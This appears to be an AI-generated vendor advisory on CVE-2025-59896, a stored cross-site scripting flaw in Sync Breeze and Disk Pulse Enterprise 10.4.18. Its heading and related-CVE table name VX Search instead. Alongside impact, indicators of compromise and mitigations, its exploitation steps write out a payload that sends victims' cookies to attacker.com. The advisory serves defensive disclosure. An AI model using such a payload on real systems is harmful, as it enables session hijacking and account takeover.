CVE-2025-59896: 
VX Search vulnerability analysis and mitigation

Overview

CVE-2025-59896 is a persistent (stored) authenticated Cross-Site Scripting (XSS) vulnerability affecting Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18, both developed by Flexense. The vulnerability stems from insufficient input validation in the /add_command?sid= endpoint, specifically in the command_name parameter. It was published on January 28, 2026, and assigned by INCIBE. The CVSS v3.1 base score is 5.4 (Medium), and the CVSS v4.0 base score is 5.1 (Medium) (INCIBE Advisory).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated attacker with low privileges can submit a crafted command_name value to the /add_command?sid= endpoint; because the application fails to sanitize or encode this input before storing and rendering it, the malicious script is persistently saved and later executed in the browsers of other authenticated users who view the affected page. Exploitation requires network access, low privileges, and passive user interaction (a victim must view the page containing the injected payload) (INCIBE Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of another authenticated user's browser session, enabling session token theft, credential harvesting, and unauthorized actions performed on behalf of the victim. The scope is changed (cross-origin impact), with low confidentiality and low integrity impact; availability is not directly affected. Because the payload is stored server-side, every authenticated user who loads the affected view is at risk, potentially enabling privilege escalation if an administrator account is targeted (INCIBE Advisory).

Exploitability

No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-59896 as of the available data. The EPSS score is approximately 0.047% (0.000470), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker account, limiting the attack surface compared to unauthenticated vulnerabilities (INCIBE Advisory).

Exploitation steps

  1. Authenticate: Obtain valid low-privilege credentials for the target Sync Breeze Enterprise Server or Disk Pulse Enterprise v10.4.18 web interface.
  2. Identify the vulnerable endpoint: Navigate to or craft an HTTP request targeting /add_command?sid=<session_id>, which accepts a command_name parameter.
  3. Inject malicious payload: Submit a POST or GET request with a crafted command_name value containing a JavaScript payload, e.g., command_name=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Payload persistence: The application stores the unsanitized input server-side without proper encoding.
  5. Victim triggers execution: When another authenticated user (e.g., an administrator) views the page or list containing the injected command name, the stored script executes in their browser.
  6. Session hijacking: The attacker receives the victim's session cookie or other sensitive data at the attacker-controlled endpoint, enabling account takeover (INCIBE Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after loading Sync Breeze or Disk Pulse web UI pages; unusual GET requests to attacker-controlled URLs containing encoded cookie or session data.
  • Logs: Web server access logs showing POST/GET requests to /add_command?sid= with command_name values containing HTML/JavaScript tags (e.g., <script>, onerror=, javascript:).
  • Application: Unexpected or unrecognized command names visible in the command list within the Sync Breeze or Disk Pulse web interface that contain script tags or encoded payloads.
  • Browser/Session: Authenticated user sessions being invalidated or reused from unexpected IP addresses shortly after accessing the affected web UI.

Mitigation and workarounds

Users should contact Flexense or monitor the vendor's official website for a patched release that addresses input validation in the command_name parameter of the /add_command endpoint. As an interim workaround, restrict access to the Sync Breeze Enterprise and Disk Pulse Enterprise web interfaces to trusted internal networks or VPN-only access, reducing exposure to potential attackers. Additionally, enforce the principle of least privilege by limiting the number of accounts with access to the affected web UI, and monitor web server logs for suspicious input patterns in the command_name parameter (INCIBE Advisory).

Community reactions

The vulnerability was disclosed by INCIBE-CERT as part of a notice covering multiple vulnerabilities in Flexense products. No significant public researcher commentary, vendor statements beyond the advisory, or notable media coverage has been identified for this specific CVE.

Additional resources


Source: This report was generated using AI

Related VX Search vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-59901HIGH8.5
  • VX Search logoVX Search
  • cpe:2.3:a:flexense:vx_search
NoYesJan 28, 2026
CVE-2025-59900MEDIUM5.1
  • VX Search logoVX Search
  • cpe:2.3:a:flexense:vx_search
NoYesJan 28, 2026
CVE-2025-59899MEDIUM5.1
  • VX Search logoVX Search
  • cpe:2.3:a:flexense:vx_search
NoYesJan 28, 2026
CVE-2025-59898MEDIUM5.1
  • VX Search logoVX Search
  • cpe:2.3:a:flexense:vx_search
NoYesJan 28, 2026
CVE-2025-59897MEDIUM5.1
  • VX Search logoVX Search
  • cpe:2.3:a:flexense:vx_search
NoYesJan 28, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management